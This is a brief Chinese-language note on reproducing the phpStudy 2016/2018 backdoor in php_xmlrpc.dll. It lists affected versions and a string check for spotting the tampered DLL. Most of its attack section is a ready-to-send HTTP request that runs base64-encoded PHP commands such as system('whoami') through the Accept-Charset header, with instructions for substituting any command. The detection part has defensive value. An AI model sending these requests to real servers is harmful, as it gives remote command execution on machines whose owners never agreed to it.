1.影響版本分佈:
- phpStudy2016
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll - phpStudy2018
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
2.直觀感性驗證:
用記事本或者Notepad++打開phpstudy安裝目錄下的:
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
存在@eval(%s('%s'));即說明有後門。
3.客觀理性驗證:
BP抓包復現 》》》 直接訪問首頁抓包
在請求頭裏構造 Accept-Encoding 和 Accept-Charset
然後在請求頭裏添加 accept-charset: c3lzdGVtKCduZXQgdXNlcicpOw==
Accept-Charset 的值就是執行的命令,默認是system('net user');
如果想要執行其他命令,直接去把命令進行base64編碼替換即可!
Post請求方式響應更直觀:在請求頭最後,製造若干空行。
Accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCd3aG9hbWknKQ==
payload:
GET / HTTP/1.1
Host: 192.168.8.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept-Encoding: gzip,deflate
Accept-Charset: c3lzdGVtKCd3aG9hbWknKQ==
Content-Length: 6
參考:
https://dylan903.coding.me/2019/09/23/phpstudy-hou-men-lou-dong-fu-xian/